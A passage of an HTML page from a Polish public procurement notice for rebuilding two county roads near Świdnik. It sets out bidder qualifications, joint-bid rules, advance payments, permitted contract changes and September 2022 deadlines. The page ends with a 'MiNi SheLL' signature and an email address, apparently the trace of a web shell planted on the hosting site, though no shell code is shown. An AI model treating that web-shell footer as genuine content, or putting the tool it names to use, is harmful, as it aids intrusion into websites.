budowy;<br/>Osoba, która będzie pełnić funkcję kierownika budowy musi posiadać uprawnienia budowlane wymagane ustawą z dnia 07 lipca 1994 r. Prawo budowlane (Dz. U. z 2020 r. poz.: 1333 z późn.zm.) oraz Rozporządzeniem Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (t.j. Dz. U z 2019 r. poz. 831) lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów. <br/>Zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 ustawy mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych. Regulację odrębną stanowią przepisy ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (jt. Dz.U. z 2020, poz. 220 z późn.zm.). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykaz podmiotowych środków dowodowych na potwierdzenie nie podlegania wykluczeniu:<br/>Zgodnie z art. 273 ust 1 Ustawy PZP oraz z § 3 Rozporządzenia Ministra Rozwoju, Pracy i Technologii w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy z dnia 23 grudnia 2020 r., W postępowaniach o wartości mniejszej niż progi unijne zamawiający, w celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu, może zamiast podmiotowych środków dowodowych, o których mowa w § 2 ust. 1 pkt 1, 2 lub 4–6, żądać oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	wykaz robót budowlanych, zgodny ze wzorem zamieszczonym w załączniku nr 4 do SWZ, wykonanych nie wcześniej niż w okresie ostatnich 5 lat od dnia, w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest wstanie uzyskać tych dokumentów –inne odpowiednie dokumenty<br/>Uwaga: Jeżeli wykonawca powołuje się na doświadczenie w realizacji robót budowlanych, wykonanych wspólnie z innymi wykonawcami, powyższy wykaz może dotyczyć tylko robót budowlanych faktycznie przez niego wykonanych. <br/>2)	wykaz osób, zgodny ze wzorem zamieszczonym w załączniku nr 5 do SWZ, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, i doświadczenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacji o podstawie do dysponowania tymi osobami</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2. Wszelka korespondencja będzie prowadzona wyłącznie z pełnomocnikiem. <br/>3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a)	oświadczenia wstępne składa z ofertą każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu lub kryteriów selekcji w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu lub kryteriów selekcji.<br/>b)	zobowiązani są oni na wezwanie Zamawiającego, złożyć podmiotowe środki dowodowe, składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/-ą spełnienie warunku<br/>c)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia, z którego wynika, które roboty budowlane/dostawy/usługi wykonają poszczególni wykonawcy. <br/>4. Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia określoną w art. 366 Kodeksu Cywilnego. <br/>5. W formularzu OFERTA należy zaznaczyć, że oferta jest składana wspólnie oraz wpisać dane dotyczące wszystkich podmiotów wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> 1.	Strony ustalają, iż rozliczenie Zamawiającego z Wykonawcą, za roboty będące przedmiotem umowy, nastąpi zgodnie z warunkami wypłat dofinansowania z Programu Rządowy Fundusz Polski Ład: Program Inwestycji Strategicznych. <br/>2.	Zasady dokonywania rozliczenia: Strony uzgadniają, że płatność z tytułu realizacji przedmiotu umowy będzie zrealizowana w następujący sposób: Zamawiający udzieli wykonawcy zaliczki na wykonanie robót budowlanych dotyczących:<br/>1)	Przebudowy drogi powiatowej nr 2111 L Kawęczyn – Kozice – Policzyzna na odcinku o łącznej długości 930 m (od km 0+000,00 do km 0+930) w wysokości …………. zł brutto (słownie: ………………..), oraz<br/>2)	Przebudowy drogi powiatowej nr 2105 L Krępiec – Minkowice na odcinku o łącznej długości 897 m (od skrzyżowania z droga gminną nr 105533L do skrzyżowania z drogą powiatową nr 2106 L, 2 odcinki robót od km 0+000,00 do km 0+406,30 oraz od km 0+544,08 do km 1+035,40)<br/>w wysokości …………. zł brutto (słownie: ………………..).<br/>Łącznie wysokość zaliczek wynosi ………………. zł brutto (słownie: ………………..), co stanowi …….% wartości wynagrodzenia wskazanego w §5 ust. 1 umowy (jednak nie mniej niż 5% wartości tego wynagrodzenia) wypłaconej na podstawie wystawionej przez Wykonawcę faktury zaliczkowej (na każdą z dróg). Pozostałą wartość wynagrodzenia Wykonawcy zostanie wypłacona po należytej realizacji całego zamówienia. <br/>3.	Zamawiający wymaga aby faktura zaliczkowa wystawiona przez Wykonawcę, została wystawiona zgodnie z art. 106f ustawy o VAT (t.j. Dz.U. z 2022 r. poz. 931).<br/>Wysokość zaliczki stanowi równowartość wkładu własnego Zamawiającego, zgodnie z zasadami Uchwały RM i Regulaminu BGK<br/>SZCZEGÓŁY W WZORZE UMOWY <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający dopuszcza możliwość zmiany Umowy w zakresie terminu realizacji przedmiotu zamówienia, gdy jest ona<br/>spowodowana: 1) warunkami atmosferycznymi – w których przez okres co najmniej 3 dni niemożliwe jest prowadzenie robót<br/>bezpiecznie pod względem BHP, w sposób prawidłowy, zgodny z umówioną technologia lub zasadami wiedzy technicznej,<br/>2) wstrzymaniem prac budowlanych przez właściwy organ z przyczyn niezależnych od Wykonawcy, 3) siłą wyższą w<br/>rozumieniu aktualnego orzecznictwa Sądu Najwyższego, 4) niemożliwością wykonywania prac ze względu na ograniczenia i<br/>nakazy spowodowane epidemią koronawirusa, zakażeniem COVID-19 co najmniej jednego pracownika realizującego<br/>umowę lub kwarantanną co najmniej dwóch pracowników realizujących umowę, 5) wydłużeniem minimalnych określonych<br/>przepisami terminów uzyskania niezbędnych uzgodnień i decyzji przez Wykonawcę i Zamawiającego, pomimo dopełnienia<br/>przez Wykonawcę i Zamawiającego należytej staranności, 6) przestojami i opóźnieniami zawinionymi przez<br/>Zamawiającego. <br/>2. informacja o zaistnieniu okoliczności, o których mowa w ust. 1 pkt 1-6 musi być przekazana<br/>Zamawiającemu na piśmie, a w przypadkach, o których mowa w ust. 1 pkt 1-3 dodatkowo potwierdzona przez inspektora<br/>nadzoru. <br/>3. W przypadku wystąpienia opóźnień spowodowanych wyżej wymienionymi okolicznościami, strony ustalą nowe<br/>terminy, z tym że maksymalny okres przesunięcia terminu zakończenia realizacji przedmiotu umowy równy będzie okresowi<br/>uzasadnionej przerwy lub przestoju. <br/>4. Zamawiający dopuszcza możliwość zmiany umowy w zakresie przedmiotu umowy<br/>lub zmiany wynagrodzenia w przypadkach:<br/>1) gdy wykonanie całego zakresu nie będzie możliwe z przyczyn<br/>prawnych, finansowych, organizacyjnych lub społecznych niezależnych od Wykonawcy, <br/>2) stwierdzenia przez Zamawiającego<br/>konieczności rezygnacji z wykonania części przedmiotu zamówienia,<br/>3) konieczności wykonania robót dodatkowych określonych w 3.	W przypadku niewykonania całości świadczenia wykonawcy wynikającego z dokumentacji projektowej wskazanej w § 3 ust. 4 oraz STWiORB, strony przewidują, że wynagrodzenie Wykonawcy ulegnie zmniejszeniu o wartość prac niewykonanych.W przypadku konieczności wykonania dodatkowych robót nieobjętych dokumentacją projektową wskazaną w § 3 ust. 4 oraz STWiORB strony przewidują możliwość zlecenia tych robót za dodatkowym wynagrodzeniem poprzez zmianę umowy na zasadach określonych w art. 454-455 ustawy Prawo zamówień publicznych. <br/>4)ustawowej zmiany stawki podatku od towarów i usług (VAT) odpowiednio poprzez podwyższenie lub obniżenie<br/>wynagrodzenia brutto z tym, że wynagrodzenie netto pozostanie niezmienione, <br/>SZCZEGÓY W SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-09-27 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/powiatswidnik</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-09-27 12:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-10-26</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com